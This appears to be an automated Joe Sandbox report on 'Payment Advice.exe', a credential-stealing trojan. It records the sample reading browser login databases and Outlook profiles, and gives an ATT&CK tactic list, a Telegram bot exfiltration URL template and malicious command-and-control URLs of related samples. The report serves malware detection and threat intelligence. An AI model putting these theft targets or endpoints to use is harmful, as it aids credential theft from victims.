                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Users\user\Desktop\Payment Advice.exe VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Payment Advice.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\Payment Advice.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\Payment Advice.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara match | File source: 00000005.00000002.2996681350.0000000003523000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  Source: Yara match | File source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTR
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTR
Tactics and techniques (one line per tactic; a number in front of a technique is the count shown in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 111 Process Injection
Credential Access: 1 OS Credential Dumping; 1 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 1 Query Registry; 1 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 1 Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

Source | Detection | Scanner | Label
Payment Advice.exe | 35% | Virustotal | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.fontbureau.com/designersG | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | Avira URL Cloud | safe
http://www.fontbureau.com/designers/? | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/cThe | 0% | Avira URL Cloud | safe
http://www.typography.netD | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | Avira URL Cloud | safe
http://www.fontbureau.com/designers? | 0% | Avira URL Cloud | safe
http://www.fontbureau.com/designers/cabarga.htmlN | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | Avira URL Cloud | safe
http://www.fontbureau.com/designers/frere-user.html | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | Avira URL Cloud | safe
http://www.fontbureau.com/designers8 | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | Avira URL Cloud | safe
http://www.fonts.com | 0% | Avira URL Cloud | safe
http://www.sakkal.com | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | Avira URL Cloud | safe
http://www.sandoll.co.kr | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 104.21.80.1 | true | false | - | high
checkip.dyndns.com | 132.226.247.73 | true | false | - | high
checkip.dyndns.org | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | - | high
http://checkip.dyndns.org/ | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designersG | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/bThe | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers? | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://reallyfreegeoip.orgd | Payment Advice.exe, 00000005.00000002.2996681350.000000000349C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.tiro.com | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://checkip.dyndns.org | Payment Advice.exe, 00000005.00000002.2996681350.000000000346C000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designers | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.goodfont.co.kr | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.carterandcone.coml | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.sajatypeworks.com | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.typography.netD | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn/cThe | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.189l | Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://checkip.dyndns.comd | Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://checkip.dyndns.org/q | Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.189d | Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://reallyfreegeoip.org | Payment Advice.exe, 00000005.00000002.2996681350.000000000349C000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://checkip.dyndns.orgd | Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.galapagosdesign.com/DPlease | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org | Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designers8 | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sandoll.co.kr | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.com | Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.urwpp.deDPlease | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.zhongyicts.com.cn | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://checkip.dyndns.org/d | Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Payment Advice.exe, 00000000.00000002.1762503668.000000000308E000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.0000000003401000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.sakkal.com | Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot-/sendDocument?chat_id= | Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | - | high
https://reallyfreegeoip.org/xml/ | Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.80.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false
132.226.247.73 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                      Analysis ID:1630045
                                                                      Start date and time:2025-03-05 13:07:19 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 5m 55s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Payment Advice.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@8/6@2/2
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 99%
                                                                      • Number of executed functions: 38
                                                                      • Number of non-executed functions: 10
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 23.199.214.10, 4.245.163.56, 13.107.246.60
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
07:08:17 | API Interceptor | 1x Sleep call for process: Payment Advice.exe modified
07:08:19 | API Interceptor | 10x Sleep call for process: powershell.exe modified
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      104.21.80.1DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                                                                      • www.rbopisalive.cyou/2dxw/
                                                                      Marzec 2025-faktura.pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • www.oldpay.online/u023/?lneDc=2js00DxFGjY6gHlVOW1q9a10L3HzPIs7WpRmaT2A/LnakQk0VzYAjcxSKMUcEwKHsPPKaiHoQA==&NvExnX=FrapFFYPB
                                                                      z1companyProfileandproducts.exeGet hashmaliciousFormBookBrowse
                                                                      • www.dd87558.vip/uoki/
                                                                      http://7a.ithuupvudv.ruGet hashmaliciousUnknownBrowse
                                                                      • 7a.ithuupvudv.ru/favicon.ico
                                                                      PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                                                                      • touxzw.ir/scc1/five/fre.php
                                                                      dfiCWCanbj.exeGet hashmaliciousLokibotBrowse
                                                                      • touxzw.ir/sccc/five/fre.php
 | laser (2).ps1 | malicious | FormBook | www.lucynoel6465.shop/jgkl/
 | laser.ps1 | malicious | FormBook | www.tumbetgirislinki.fit/k566/
 | QUOTATION REQUEST.exe | malicious | FormBook | www.shlomi.app/t3l4/
 | Quotation.exe | malicious | FormBook | www.askvtwv8.top/uztg/
132.226.247.73 | 50% deposit's payment advice.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | rPurchaseOrder-25-1201.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | Purchase Order # 8MJA15.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | akXjj2a58b.vbs | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
 | r59e5aba5-e690-44bf-a397-997e3c24c602.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
